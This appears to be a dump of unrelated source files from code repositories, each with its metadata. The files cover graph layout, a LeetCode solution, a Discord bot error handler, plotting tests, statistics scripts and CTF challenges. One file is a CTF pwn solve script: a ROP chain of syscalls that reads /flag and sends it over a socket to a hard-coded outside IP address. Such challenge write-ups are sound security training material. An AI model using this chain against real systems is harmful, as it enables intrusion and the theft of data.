marsyas.MarControlPtr.from_bool(True))
pnet.updControl("Gain/gain/mrs_real/gain",
marsyas.MarControlPtr.from_real(0.0))
del pnet
print "Done"
| 29.818182 | 103 | 0.636814 |
a4691d17b47d44eb5109026ed6f99a3f1b2ed3dc
| 614 |
py
|
Python
|
algos/longest_path.py
|
weberja/praktikum_graphen
|
da3ecefdf1327078697e3787cfe19414a9ac13c4
|
[
"Apache-2.0"
] | 1 |
2021-07-22T10:28:40.000Z
|
2021-07-22T10:28:40.000Z
|
algos/longest_path.py
|
weberja/praktikum_graphen
|
da3ecefdf1327078697e3787cfe19414a9ac13c4
|
[
"Apache-2.0"
] | null | null | null |
algos/longest_path.py
|
weberja/praktikum_graphen
|
da3ecefdf1327078697e3787cfe19414a9ac13c4
|
[
"Apache-2.0"
] | null | null | null |
from pathlib import Path
import matplotlib.pyplot as plt
import networkx as nx
import algos.walker as wk
from helper_functions import graph_helper_functions as gh
def run(path, figsize=(20, 20), key=None):
G = gh.load_file(path, key=key)
G.greedy_cycle_removal()
G.longest_path_layering()
pos = wk.tree_layout(G.to_tree())
for u in G.nodes:
x, y = pos[u]
pos[u] = (x, -G.nodes[u]['level'])
print("Drawing...")
plt.figure(figsize=figsize)
nx.draw(G, pos=pos, with_labels=True)
print("Writing to file...")
plt.savefig(f'results/{Path(path).stem}.png')
| 22.740741 | 57 | 0.659609 |
74c4772af7109ae98aa0b7f769064ee7dd9fb758
| 378 |
py
|
Python
|
leetcode/319-Bulb-Switcher/BulbSwitcher_001_TLE.py
|
cc13ny/all-in
|
bc0b01e44e121ea68724da16f25f7e24386c53de
|
[
"MIT"
] | 1 |
2015-12-16T04:01:03.000Z
|
2015-12-16T04:01:03.000Z
|
leetcode/319-Bulb-Switcher/BulbSwitcher_001_TLE.py
|
cc13ny/all-in
|
bc0b01e44e121ea68724da16f25f7e24386c53de
|
[
"MIT"
] | 1 |
2016-02-09T06:00:07.000Z
|
2016-02-09T07:20:13.000Z
|
leetcode/319-Bulb-Switcher/BulbSwitcher_001_TLE.py
|
cc13ny/all-in
|
bc0b01e44e121ea68724da16f25f7e24386c53de
|
[
"MIT"
] | 2 |
2019-06-27T09:07:26.000Z
|
2019-07-01T04:40:13.000Z
|
class Solution(object):
def bulbSwitch(self, n):
"""
:type n: int
:rtype: int
"""
num_of_facs = [1 for i in range(n)]
for j in range(2, n + 1):
for k in range(1, n / j + 1):
num_of_facs[j * k - 1] += 1
res = 0
for num in num_of_facs:
res += num % 2
return res
| 22.235294 | 43 | 0.42328 |
77e8ce286a904effb315a4c8fe17cdd31db3e301
| 7,990 |
py
|
Python
|
Extensions/Error-Handler.py
|
Drageast/Die_Botin
|
b574166a37c0f92c34db99931c8c894390fbead9
|
[
"BSD-3-Clause"
] | null | null | null |
Extensions/Error-Handler.py
|
Drageast/Die_Botin
|
b574166a37c0f92c34db99931c8c894390fbead9
|
[
"BSD-3-Clause"
] | null | null | null |
Extensions/Error-Handler.py
|
Drageast/Die_Botin
|
b574166a37c0f92c34db99931c8c894390fbead9
|
[
"BSD-3-Clause"
] | null | null | null |
# Import
import asyncio
import datetime
import traceback
from datetime import datetime
import aiohttp
import discord
from discord import Webhook, AsyncWebhookAdapter
from discord.ext import commands
# Utils
import Utils
# Cog Initialising
class ErrorHandling(commands.Cog):
def __init__(self, client):
self.client = client
# ERROR_HANDLER
@commands.Cog.listener()
async def on_command_error(self, ctx, error):
if isinstance(error, commands.CheckFailure):
try:
await ctx.message.delete()
except Exception as e:
return
return
elif isinstance(error, commands.DisabledCommand) or isinstance(error, commands.NoPrivateMessage) or isinstance(error, commands.BadArgument or commands.ArgumentParsingError or commands.BadBoolArgument) or \
isinstance(error, commands.MissingRequiredArgument or commands.TooManyArguments) or isinstance(error, commands.MissingPermissions or commands.BotMissingPermissions) or \
isinstance(error, commands.NotOwner) or isinstance(error, commands.CommandOnCooldown) or isinstance(error, commands.CheckFailure):
embed = discord.Embed(
title=f'{Utils.YamlContainerManagement.GET_yamlAttr("Embed", "HTitle")}',
colour=discord.Colour(Utils.Farbe.Dark_Blue),
description=f'Fehler:\n`{error}`\n'
)
embed.set_thumbnail(url=self.client.user.avatar_url)
try:
await ctx.message.delete()
except discord.HTTPException:
pass
m = await ctx.send(embed=embed)
await asyncio.sleep(15)
try:
await m.delete()
except discord.HTTPException:
pass
elif isinstance(error, commands.CommandInvokeError):
if isinstance(error.original, Utils.DatabasePreconditioning):
embed = discord.Embed(
title=f'{Utils.YamlContainerManagement.GET_yamlAttr("Embed", "HTitle")}',
colour=discord.Colour(Utils.Farbe.Dark_Blue),
description=f'Ein Fehler in der Datenbank ist aufgetreten:\n`{error}`\n'
)
embed.set_thumbnail(url=self.client.user.avatar_url)
try:
await ctx.message.delete()
except discord.HTTPException:
pass
m = await ctx.send(embed=embed)
await asyncio.sleep(15)
try:
await m.delete()
except discord.HTTPException:
pass
else:
owner = await self.client.fetch_user(Utils.YamlContainerManagement.GET_yamlAttr("Variablen", "Dev_IDs", "Drageast"))
embed = discord.Embed(
title='ACHTUNG!',
colour=discord.Colour(Utils.Farbe.Dark_Blue),
description='Der Command ist **korrumpiert**!\nTritt dieser Fehler erneut auf, '
f'kontaktiere **dringend** meinen Developer: {owner.mention}'
)
embed.add_field(name='**LOG:**', value=f'```css\n[{error}]\n```')
embed.set_thumbnail(url=self.client.user.avatar_url)
async with aiohttp.ClientSession() as session:
url = Utils.YamlContainerManagement.GET_yamlAttr("Variablen", "ClientSide", "ClientWebhooks", "ErrorHook")
webhook = Webhook.from_url(url, adapter=AsyncWebhookAdapter(session))
timestamp = datetime.utcnow()
trace = traceback.format_exception(None, error, error.__traceback__)
b = 0
erembed = discord.Embed(
title="\u200b\nEin schwerwiegender Fehler ist aufgetreten!\n\u200b",
colour=discord.Colour(Utils.Farbe.Dark_Blue)
)
erembed.set_author(name=f"{timestamp.strftime(r'%I:%M %p')}")
erembed.add_field(name='**OPERATOR:**', value=f'```fix\n[{ctx.author} / {ctx.author.id}]\n```',
inline=False)
try:
erembed.add_field(name='**SERVER:**', value=f'```fix\n[{ctx.guild.name}]\n```', inline=False)
erembed.add_field(name='**KANAL:**', value=f'```fix\n[{ctx.channel.name}]\n```', inline=False)
except AttributeError:
pass
erembed.add_field(name='**COMMAND:**',
value=f'```fix\n[{self.client.command_prefix}{ctx.command.qualified_name}]\n```',
inline=False)
erembed.add_field(name='**NACHRICHT:**', value=f'```fix\n[{ctx.message.content}]\n```',
inline=False)
erembed.add_field(name='**ERROR:**', value=f'```css\n[{error}]\n```\n\n\u200b', inline=False)
erembed.add_field(name='**TRACEBACK:**', value=f'\u200b', inline=False)
erembed.set_thumbnail(url=self.client.user.avatar_url)
for o in trace:
erembed.add_field(name='\u200b', value=f'```python\n{trace[b]}\n```', inline=False)
b += 1
await webhook.send(username="Ein korrumpierter Command wurde ausgelöst!",
avatar_url=self.client.user.avatar_url, embed=erembed)
try:
await ctx.message.delete()
except discord.HTTPException:
pass
m = await ctx.send(embed=embed)
await asyncio.sleep(15)
try:
await m.delete()
except discord.HTTPException:
pass
# COMMAND_HANDLER
@commands.command(aliases=["deas"])
@commands.is_owner()
async def disable_commands(self, ctx, *, command_name):
if command_name is not None:
command = self.client.get_command(command_name)
if command is None:
embed = discord.Embed(
title=f'{Utils.YamlContainerManagement.GET_yamlAttr("Embed", "HTitle")}',
colour=discord.Colour(Utils.Farbe.Dark_Blue),
description=f'Dieser Command existiert nicht.\nÜberprüfe ihn auf Rechtschreibfehler.\nDeine Angabe: **{command_name}**'
)
embed.set_thumbnail(url=self.client.user.avatar_url)
await Utils.TimeSend.se_ctx(ctx, embed, 30)
elif command == ctx.command:
embed = discord.Embed(
title=f'{Utils.YamlContainerManagement.GET_yamlAttr("Embed", "HTitle")}',
colour=discord.Colour(Utils.Farbe.Dark_Blue),
description=f'Du darfst diesen Command nicht Deaktivieren!'
)
embed.set_thumbnail(url=self.client.user.avatar_url)
await Utils.TimeSend.se_ctx(ctx, embed, 30)
else:
command.enabled = not command.enabled
choice = "Aktiviert" if command.enabled else "Deaktiviert"
choice_colour = Utils.Farbe.Light_Blue if command.enabled else Utils.Farbe.Dark_Blue
embed = discord.Embed(
title=f'{choice}',
colour=discord.Colour(choice_colour),
description=f'Der Command: **{command}** wurde erfolgreich {choice}.'
)
embed.set_thumbnail(url=self.client.user.avatar_url)
await Utils.TimeSend.se_ctx(ctx, embed, 10)
# Cog Finishing
def setup(client):
client.add_cog(ErrorHandling(client))
| 41.185567 | 213 | 0.550313 |
7024b0db92aa1c93b80803e4a6fc27ce1bb052a4
| 915 |
py
|
Python
|
frappe-bench/apps/erpnext/erpnext/tests/utils.py
|
Semicheche/foa_frappe_docker
|
a186b65d5e807dd4caf049e8aeb3620a799c1225
|
[
"MIT"
] | null | null | null |
frappe-bench/apps/erpnext/erpnext/tests/utils.py
|
Semicheche/foa_frappe_docker
|
a186b65d5e807dd4caf049e8aeb3620a799c1225
|
[
"MIT"
] | null | null | null |
frappe-bench/apps/erpnext/erpnext/tests/utils.py
|
Semicheche/foa_frappe_docker
|
a186b65d5e807dd4caf049e8aeb3620a799c1225
|
[
"MIT"
] | null | null | null |
# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt
from __future__ import unicode_literals
import frappe
def create_test_contact_and_address():
frappe.db.sql('delete from tabContact')
frappe.db.sql('delete from tabAddress')
frappe.db.sql('delete from `tabDynamic Link`')
frappe.get_doc(dict(
doctype='Address',
address_title='_Test Address for Customer',
address_type='Office',
address_line1='Station Road',
city='_Test City',
state='Test State',
country='India',
links = [dict(
link_doctype='Customer',
link_name='_Test Customer'
)]
)).insert()
frappe.get_doc(dict(
doctype='Contact',
email_id='[email protected]',
phone='+91 0000000000',
first_name='_Test Contact for _Test Customer',
links = [dict(
link_doctype='Customer',
link_name='_Test Customer'
)]
)).insert()
| 24.72973 | 68 | 0.725683 |
56444732817776a4ea0d7b414bb0febfe8d243dd
| 6,331 |
py
|
Python
|
src/test/tests/plots/multicolor.py
|
visit-dav/vis
|
c08bc6e538ecd7d30ddc6399ec3022b9e062127e
|
[
"BSD-3-Clause"
] | 226 |
2018-12-29T01:13:49.000Z
|
2022-03-30T19:16:31.000Z
|
src/test/tests/plots/multicolor.py
|
visit-dav/vis
|
c08bc6e538ecd7d30ddc6399ec3022b9e062127e
|
[
"BSD-3-Clause"
] | 5,100 |
2019-01-14T18:19:25.000Z
|
2022-03-31T23:08:36.000Z
|
src/test/tests/plots/multicolor.py
|
visit-dav/vis
|
c08bc6e538ecd7d30ddc6399ec3022b9e062127e
|
[
"BSD-3-Clause"
] | 84 |
2019-01-24T17:41:50.000Z
|
2022-03-10T10:01:46.000Z
|
# ----------------------------------------------------------------------------
# MODES: serial
# CLASSES: nightly
#
# Test Case: multicolor.py
#
# Tests: Tests setting colors using the multiColor field in some of
# our plots.
# Plots - Boundary, Contour, FilledBoundary, Subset
# Operators - Transform
#
# Programmer: Brad Whitlock
# Date: Wed Apr 6 17:52:12 PST 2005
#
# Modifications:
#
# Mark C. Miller, Thu Jul 13 22:41:56 PDT 2006
# Added test of user-specified material colors
#
# Mark C. Miller, Wed Jan 20 07:37:11 PST 2010
# Added ability to swtich between Silo's HDF5 and PDB data.
# ----------------------------------------------------------------------------
def TestColorDefinitions(testname, colors):
s = ""
for c in colors:
s = s + str(c) + "\n"
TestText(testname, s)
def TestMultiColor(section, plotAtts, decreasingOpacity):
# Get the current colors.
m = plotAtts.GetMultiColor()
# Test what the image currently looks like.
Test("multicolor_%d_00" % section)
# Change the colors all at once. We should have red->blue
for i in range(len(m)):
t = float(i) / float(len(m) - 1)
c = int(t * 255.)
m[i] = (255-c, 0, c, 255)
plotAtts.SetMultiColor(m)
SetPlotOptions(plotAtts)
Test("multicolor_%d_01" % section)
TestColorDefinitions("multicolor_%d_02" % section, plotAtts.GetMultiColor())
# Change the colors another way. We should get green to blue
for i in range(len(m)):
t = float(i) / float(len(m) - 1)
c = int(t * 255.)
plotAtts.SetMultiColor(i, 0, 255-c, c)
SetPlotOptions(plotAtts)
Test("multicolor_%d_03" % section)
TestColorDefinitions("multicolor_%d_04" % section, plotAtts.GetMultiColor())
# Change the colors another way. We should get yellow to red but
# the redder it gets, the more transparent it should also get.
for i in range(len(m)):
t = float(i) / float(len(m) - 1)
c = int(t * 255.)
if decreasingOpacity:
plotAtts.SetMultiColor(i, (255, 255-c, 0, 255 - c))
else:
plotAtts.SetMultiColor(i, (255, 255-c, 0, c))
SetPlotOptions(plotAtts)
Test("multicolor_%d_05" % section)
TestColorDefinitions("multicolor_%d_06" % section, plotAtts.GetMultiColor())
def test1():
TestSection("Testing setting of multiColor in Boundary plot")
# Set up the plot
OpenDatabase(silo_data_path("rect2d.silo"))
AddPlot("Boundary", "mat1")
b = BoundaryAttributes()
b.lineWidth = 4
DrawPlots()
# Test the plot
TestMultiColor(0, b, 0)
# Delete the plots
DeleteAllPlots()
def test2():
TestSection("Testing setting of multiColor in Contour plot")
# Set up the plot
OpenDatabase(silo_data_path("noise.silo"))
AddPlot("Contour", "hardyglobal")
c = ContourAttributes()
c.contourNLevels = 20
SetPlotOptions(c)
DrawPlots()
# Set the view.
v = GetView3D()
v.viewNormal = (-0.400348, -0.676472, 0.618148)
v.focus = (0,0,0)
v.viewUp = (-0.916338, 0.300483, -0.264639)
v.parallelScale = 17.3205
v.imagePan = (0, 0.0397866)
v.imageZoom = 1.07998
SetView3D(v)
# Test the plot
TestMultiColor(1, c, 0)
# Delete the plots
DeleteAllPlots()
def test3():
TestSection("Testing setting of multiColor in FilledBoundary plot")
# Set up the plots. First we want globe so we can see something inside
# of the Subset plot to make sure that setting alpha works.
OpenDatabase(silo_data_path("globe.silo"))
AddPlot("Pseudocolor", "w")
p = PseudocolorAttributes()
p.legendFlag = 0
p.colorTableName = "xray"
SetPlotOptions(p)
OpenDatabase(silo_data_path("bigsil.silo"))
AddPlot("FilledBoundary", "mat")
f = FilledBoundaryAttributes()
f.legendFlag = 0
SetPlotOptions(f)
# Add an operator to globe to make it small.
SetActivePlots(0)
AddOperator("Transform", 0)
t = TransformAttributes()
t.doScale = 1
t.scaleX, t.scaleY, t.scaleZ = 0.04, 0.04, 0.04
t.doTranslate = 1
t.translateX, t.translateY, t.translateZ = 0.5, 0.5, 0.5
SetOperatorOptions(t)
SetActivePlots(1)
DrawPlots()
# Set the view.
v = GetView3D()
v.viewNormal = (-0.385083, -0.737931, -0.554229)
v.focus = (0.5, 0.5, 0.5)
v.viewUp = (-0.922871, 0.310902, 0.227267)
v.parallelScale = 0.866025
v.imagePan = (-0.0165315, 0.0489375)
v.imageZoom = 1.13247
SetView3D(v)
# Test the plot
TestMultiColor(2, f, 1)
# Delete the plots
DeleteAllPlots()
def test4():
TestSection("Testing setting of multiColor in Subset plot")
# Set up the plots. First we want globe so we can see something inside
# of the Subset plot to make sure that setting alpha works.
OpenDatabase(silo_data_path("globe.silo"))
AddPlot("Pseudocolor", "w")
p = PseudocolorAttributes()
p.legendFlag = 0
p.colorTableName = "xray"
SetPlotOptions(p)
OpenDatabase(silo_data_path("bigsil.silo"))
AddPlot("Subset", "domains")
s = SubsetAttributes()
s.legendFlag = 0
SetPlotOptions(s)
# Add an operator to globe to make it small.
SetActivePlots(0)
AddOperator("Transform", 0)
t = TransformAttributes()
t.doScale = 1
t.scaleX, t.scaleY, t.scaleZ = 0.04, 0.04, 0.04
t.doTranslate = 1
t.translateX, t.translateY, t.translateZ = 0.5, 0.5, 0.5
SetOperatorOptions(t)
SetActivePlots(1)
DrawPlots()
# Set the view.
v = GetView3D()
v.viewNormal = (-0.385083, -0.737931, -0.554229)
v.focus = (0.5, 0.5, 0.5)
v.viewUp = (-0.922871, 0.310902, 0.227267)
v.parallelScale = 0.866025
v.imagePan = (-0.0165315, 0.0489375)
v.imageZoom = 1.13247
SetView3D(v)
# Test the plot
TestMultiColor(3, s, 1)
# Delete the plots
DeleteAllPlots()
def test5():
TestSection("Testing user defined colors for FilledBoundary")
ResetView()
OpenDatabase(silo_data_path("globe_matcolors.silo"))
AddPlot("FilledBoundary","mat1")
AddOperator("Slice")
DrawPlots()
Test("multicolor_matcolors")
DeleteAllPlots()
def main():
test1()
test2()
test3()
test4()
test5()
# Run the tests
main()
Exit()
| 27.526087 | 80 | 0.619491 |
8db59ad767ca866816a196da3a6146244ffa5d3c
| 195 |
py
|
Python
|
0-notes/job-search/Cracking the Coding Interview/C04TreesGraphs/questions/4.6-questions.py
|
eengineergz/Lambda
|
1fe511f7ef550aed998b75c18a432abf6ab41c5f
|
[
"MIT"
] | null | null | null |
0-notes/job-search/Cracking the Coding Interview/C04TreesGraphs/questions/4.6-questions.py
|
eengineergz/Lambda
|
1fe511f7ef550aed998b75c18a432abf6ab41c5f
|
[
"MIT"
] | null | null | null |
0-notes/job-search/Cracking the Coding Interview/C04TreesGraphs/questions/4.6-questions.py
|
eengineergz/Lambda
|
1fe511f7ef550aed998b75c18a432abf6ab41c5f
|
[
"MIT"
] | null | null | null |
# 4.6 Successor
# Write an algorithm to find the "next" node (i.e. in-order successor) of a given node in a binary
# search tree.
# You may assume that each node has a link to its parent.
| 27.857143 | 98 | 0.697436 |
8df6b2cabed9326fb9ee9a6f9b03957c9522e72b
| 1,211 |
py
|
Python
|
Problems/BinarySearchTree/Medium/ConstructBTPreorderPostorder/construct_bt_preorder_post_order.py
|
dolong2110/Algorithm-By-Problems-Python
|
31ecc7367aaabdd2b0ac0af7f63ca5796d70c730
|
[
"MIT"
] | 1 |
2021-08-16T14:52:05.000Z
|
2021-08-16T14:52:05.000Z
|
Problems/BinarySearchTree/Medium/ConstructBTPreorderPostorder/construct_bt_preorder_post_order.py
|
dolong2110/Algorithm-By-Problems-Python
|
31ecc7367aaabdd2b0ac0af7f63ca5796d70c730
|
[
"MIT"
] | null | null | null |
Problems/BinarySearchTree/Medium/ConstructBTPreorderPostorder/construct_bt_preorder_post_order.py
|
dolong2110/Algorithm-By-Problems-Python
|
31ecc7367aaabdd2b0ac0af7f63ca5796d70c730
|
[
"MIT"
] | null | null | null |
from typing import List, Optional
# Definition for a binary tree node.
class TreeNode:
def __init__(self, val=0, left=None, right=None):
self.val = val
self.left = left
self.right = right
# Recursive
def constructFromPrePost(self, preorder: List[int], postorder: List[int]) -> Optional[TreeNode]:
self.pre_index, self.post_index = 0, 0
def construct():
root = TreeNode(preorder[self.pre_index])
self.pre_index += 1
if root.val != postorder[self.post_index]:
root.left = construct()
if root.val != postorder[self.post_index]:
root.right = construct()
self.post_index += 1
return root
return construct()
# Iterative
# def constructFromPrePost(self, preorder: List[int], postorder: List[int]) -> Optional[TreeNode]:
# stack = [TreeNode(preorder[0])]
# j = 0
# for v in preorder[1:]:
# node = TreeNode(v)
# while stack[-1].val == postorder[j]:
# stack.pop()
# j += 1
# if not stack[-1].left:
# stack[-1].left = node
# else:
# stack[-1].right = node
# stack.append(node)
# return stack[0]
| 25.765957 | 98 | 0.573906 |
5c2e78f6ec9188752e839badd8479abebd9464c3
| 2,878 |
py
|
Python
|
015-C111-ZTests/__main__.py
|
somePythonProgrammer/PythonCode
|
fb2b2245db631cefd916a960768f411969b0e78f
|
[
"MIT"
] | 2 |
2021-09-28T13:55:20.000Z
|
2021-11-15T10:08:49.000Z
|
015-C111-ZTests/__main__.py
|
somePythonProgrammer/PythonCode
|
fb2b2245db631cefd916a960768f411969b0e78f
|
[
"MIT"
] | null | null | null |
015-C111-ZTests/__main__.py
|
somePythonProgrammer/PythonCode
|
fb2b2245db631cefd916a960768f411969b0e78f
|
[
"MIT"
] | 1 |
2022-01-20T03:02:20.000Z
|
2022-01-20T03:02:20.000Z
|
# 015-C111-ZTests
# This is a python script made by @somePythonProgrammer
# for a WhiteHat Junior project.
from os import name
from numpy.testing._private.utils import measure
import pandas as pd
import plotly.graph_objects as go
import plotly.figure_factory as ff
import statistics
import random
df = pd.read_csv('014-C110-SamplingDistribution/csv/data.csv')
marks = df['responses'].tolist()
marks.pop(0)
df_intervention = pd.read_csv('015-C111-ZTests/csv/data.csv')
marks_intervention = df_intervention['responses'].tolist()
marks_intervention.pop(0)
for i in marks_intervention:
try:
marks_intervention[marks_intervention.index(i)] = int(i)
except ValueError:
marks_intervention[marks_intervention.index(i)] = 0
for i in marks:
try:
marks[marks.index(i)] = int(i)
except ValueError:
marks[marks.index(i)] = 0
def random_indexes_mean(counter):
indexes = []
for i in range(counter):
indexes.append(marks_intervention[random.randint(0, len(marks_intervention)-1)])
return statistics.mean(indexes)
def main():
_data = []
for i in range(0, 1000):
_data.append(random_indexes_mean(500))
mean = statistics.mean(marks)
mean_intervention = statistics.mean(_data)
first_std = mean + statistics.stdev(_data)
second_std = mean + 2 * statistics.stdev(_data)
third_std = mean + 3 * statistics.stdev(_data)
first_std_end = -first_std
second_std_end = -second_std
third_std_end = -third_std
print('The mean is:', mean)
print(f'The first standard deviation is {first_std}')
print(f'The second standard deviation is {second_std}')
print(f'The third standard deviation is {third_std}')
z_score = (mean_intervention - mean) / statistics.stdev(marks_intervention)
print(f'The z-score is {z_score}')
plot = ff.create_distplot([_data], ['Marks'], show_hist=False)
plot.add_traces(go.Scatter(x=[first_std, first_std], y=[0, 0.7], mode='lines', name='First Standard Deviation'))
plot.add_traces(go.Scatter(x=[first_std_end, first_std_end], y=[0, 0.7], mode='lines', name='First Standard Deviation End'))
plot.add_traces(go.Scatter(x=[second_std, second_std], y=[0, 0.7], mode='lines', name='Second Standard Deviation'))
plot.add_traces(go.Scatter(x=[second_std_end, second_std_end], y=[0, 0.7], mode='lines', name='Second Standard Deviation End'))
plot.add_traces(go.Scatter(x=[third_std, third_std], y=[0, 0.7], mode='lines', name='Third Standard Deviation'))
plot.add_traces(go.Scatter(x=[third_std_end, third_std_end], y=[0, 0.7], mode='lines', name='Third Standard Deviation End'))
plot.write_html('015-C111-ZTests/index.html', auto_open = True)
if mean < mean_intervention:
print('Intervention successful!')
else:
print('Intervention failed!')
if __name__ == '__main__':
main()
| 35.530864 | 131 | 0.704656 |
ebbaa666b451a8bcca6ea804702e3e76aeadfad1
| 2,775 |
py
|
Python
|
21-fs-ias-lec/03-BACnetCore/src/core/interface/feed.py
|
cn-uofbasel/BCN
|
2d0852e00f2e7f3c4f7cf30f60c6765f2761f80a
|
[
"MIT"
] | 8 |
2020-03-17T21:12:18.000Z
|
2021-12-12T15:55:54.000Z
|
21-fs-ias-lec/03-BACnetCore/src/core/interface/feed.py
|
cn-uofbasel/BCN
|
2d0852e00f2e7f3c4f7cf30f60c6765f2761f80a
|
[
"MIT"
] | 2 |
2021-07-19T06:18:43.000Z
|
2022-02-10T12:17:58.000Z
|
21-fs-ias-lec/03-BACnetCore/src/core/interface/feed.py
|
cn-uofbasel/BCN
|
2d0852e00f2e7f3c4f7cf30f60c6765f2761f80a
|
[
"MIT"
] | 25 |
2020-03-20T09:32:45.000Z
|
2021-07-18T18:12:59.000Z
|
from .event import Event
class FeedMeta:
"""
This class represents the Metadata for every feed.
"""
def __init__(self, feed_name, public_key, signature_info):
self.feed_name = feed_name
self.public_key = public_key
self.signature_info = signature_info
def get_feed_name(self):
return self.feed_name
def get_public_key(self):
return self.public_key
def get_signature_info(self):
return self.signature_info
def __str__(self):
return f"--feed-name: {self.feed_name}\n--feed_id: {self.public_key}\n--signature-info: {self.signature_info}"
class Feed:
"""
This class is the base Interface class for every Feed.
"""
def __init__(self, feed_id, storage_controller):
self.feed_id = feed_id
self.strg_ctrl = storage_controller
# this is separated due to self.meta reference in get_feed_meta()
self.meta = None
self.meta = self.get_feed_meta()
def get_event(self, seq_num: int) -> Event:
"""
This method tries to get a certain event. UnknownFeedError or EventNotfoundError can raise.
"""
return self.strg_ctrl.get_event(seq_num, self.feed_id)
def get_current_seq_num(self):
"""
This method tries to get the current sequence number of this feed. -1 is returned when feed not known or no
event in database.
"""
return self.strg_ctrl.get_current_seq_num(self.feed_id)
def get_last_event(self):
"""
This method tries to get the latest event of this feed. Since it uses get_content(), UnknownFeedError
or EventNotfoundError can raise.
"""
return self.get_event(self.get_current_seq_num())
def get_feed_id(self):
"""
Returns the feed_id of this feed
"""
return self.feed_id
def get_feed_meta(self):
"""
Getter for the metadata of this feed. If the metadata is currently None(= not able to load it yet). Then try
to load it again. Anyway return self.meta.
"""
if self.meta is None:
self._reload_meta()
return self.meta
def _reload_meta(self):
"""
This method tries to extract the metadata of a feed from the last event of this feed. if this fails (ex when no
events of this feed are in the database) then return None
"""
try:
first_event = self.get_event(0)
name = self.strg_ctrl.get_name_by_feed_id(self.feed_id)
self.meta = FeedMeta(name, first_event.meta.feed_id, first_event.meta.signature_info)
except Exception:
self.meta = None
def __str__(self):
return f"\n****Feed****\n{str(self.meta)}"
| 32.267442 | 119 | 0.636396 |
ccdf8f1eac886bcd1157d7b5357039a843c4079e
| 368 |
py
|
Python
|
crypto/Shuffler/release/chall.py
|
vidner/codepwnda-ctf
|
7e086044b753fe555b44395b79827d2f5b89da1d
|
[
"Unlicense"
] | 6 |
2021-02-18T15:07:55.000Z
|
2022-02-04T01:38:10.000Z
|
crypto/Shuffler/release/chall.py
|
vidner/codepwnda-ctf
|
7e086044b753fe555b44395b79827d2f5b89da1d
|
[
"Unlicense"
] | null | null | null |
crypto/Shuffler/release/chall.py
|
vidner/codepwnda-ctf
|
7e086044b753fe555b44395b79827d2f5b89da1d
|
[
"Unlicense"
] | null | null | null |
import random, string
def encrypt(msg):
x = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'
y = 'BXcjk7JCT5goWsq9Lhr2zvVISbKfGteauUHMlRiQ3Nd6A8p14OnmZ0xyYFPEwD'
z = string.maketrans(x, y)
return msg.translate(z)
pt = open('plaintext.txt').read().strip()
N = random.randint(21, 42)
ct = encrypt(pt)
for _ in range(N):
ct = encrypt(ct)
print ct
| 23 | 69 | 0.76087 |
6928501e2000846c0d8fc68cc04c0dfdb6116604
| 2,389 |
py
|
Python
|
pwn/ezrop_revenge/solve.py
|
vidner/codepwnda-ctf
|
7e086044b753fe555b44395b79827d2f5b89da1d
|
[
"Unlicense"
] | 6 |
2021-02-18T15:07:55.000Z
|
2022-02-04T01:38:10.000Z
|
pwn/ezrop_revenge/solve.py
|
vidner/codepwnda-ctf
|
7e086044b753fe555b44395b79827d2f5b89da1d
|
[
"Unlicense"
] | null | null | null |
pwn/ezrop_revenge/solve.py
|
vidner/codepwnda-ctf
|
7e086044b753fe555b44395b79827d2f5b89da1d
|
[
"Unlicense"
] | null | null | null |
#!/usr/bin/env python
from pwn import *
context.terminal = ['tmux', 'split-window', '-h']
context.log_level = ['debug', 'info', 'warn'][1]
BINARY = './chall'
HOST = '35.185.187.162'
PORT = 17005
# 0x08057bd2: mov dword ptr [edx], eax; ret;
# 0x0806ee8b: pop edx; ret;
# 0x080ab5ca: pop eax; ret;
# 0x0806eeb2: pop ecx; pop ebx; ret;
# 0x0806f7c0: int 0x80; ret;
def syscall(eax, ebx=0, ecx=0, edx=0):
payload = p32(0x0806ee8b)
payload += p32(edx)
payload += p32(0x080ab5ca)
payload += p32(eax)
payload += p32(0x0806eeb2)
payload += p32(ecx)
payload += p32(ebx)
payload += p32(0x0806f7c0)
return payload
def write_where_what(where, what):
payload = p32(0x080ab5ca)
payload += p32(what)
payload += p32(0x0806ee8b)
payload += p32(where)
payload += p32(0x08057bd2)
return payload
def write_str(where, data):
payload = ''
data_split = [data[i:i+4].ljust(4, '\x00') for i in range(0, len(data), 4)]
for d in data_split:
payload += write_where_what(where, u32(d))
where += 4
return payload
def exploit(REMOTE):
if not REMOTE: gdb.attach(r, 'b *0x0806f7c0')
payload = 'AAAAAAAAAAAAAAAAAAAA'
# open flag
payload += write_str(elf.bss(0x10), '/flag\x00')
payload += syscall(5, elf.bss(0x10), 0, 0)
# open socket
sock_arg = p32(2)
sock_arg += p32(1)
sock_arg += p32(0)
payload += write_str(elf.bss(0x20), sock_arg)
payload += syscall(0x66, 1, elf.bss(0x20))
# connect
IPHEX = 0x67853813
IPHEX = 0x030ed4ad # ngrok
connect_struct = p32(0x0b290002) # port: 1507, domain: AF_INET
connect_struct += p32(IPHEX)[::-1]
payload += write_str(elf.bss(0x30), connect_struct)
connect_arg = p32(1) # sockfd
connect_arg += p32(elf.bss(0x30)) # connect_struct
connect_arg += p32(0x10) # idk
payload += write_str(elf.bss(0x100), connect_arg)
payload += syscall(0x66, 3, elf.bss(0x100))
# read flag
payload += syscall(3, 0, elf.bss(0x200), 0x100)
# write to socket
payload += syscall(4, 1, elf.bss(0x200), 0x100)
r.sendafter('\n', payload)
if __name__ == '__main__':
REMOTE = len(sys.argv) > 1
elf = ELF(BINARY, checksec=False)
if REMOTE:
r = remote(HOST, PORT)
else:
r = elf.process(aslr=False)
info(r.pid)
exploit(REMOTE)
r.interactive()
| 25.414894 | 79 | 0.616995 |
15c28f57a5f1b0090f228689a2392ab6c22ad488
| 48,172 |
py
|
Python
|
tests/test_user_io.py
|
S0S-90/geocachingTooly
|
a6ed356d0187dd517a9436a83bded3752d488db5
|
[
"MIT"
] | null | null | null |
tests/test_user_io.py
|
S0S-90/geocachingTooly
|
a6ed356d0187dd517a9436a83bded3752d488db5
|
[
"MIT"
] | null | null | null |
tests/test_user_io.py
|
S0S-90/geocachingTooly
|
a6ed356d0187dd517a9436a83bded3752d488db5
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python
# -*- coding: utf-8 -*-
"""tests for user_io.py"""
import unittest
from unittest import mock
import sys
from io import StringIO
import test_frame
import user_io
import geocache
class TestGeneralOutput(unittest.TestCase):
def test_normaltext(self):
out = StringIO()
sys.stdout = out # capture print output in out
user_io.general_output("hello") # fill out
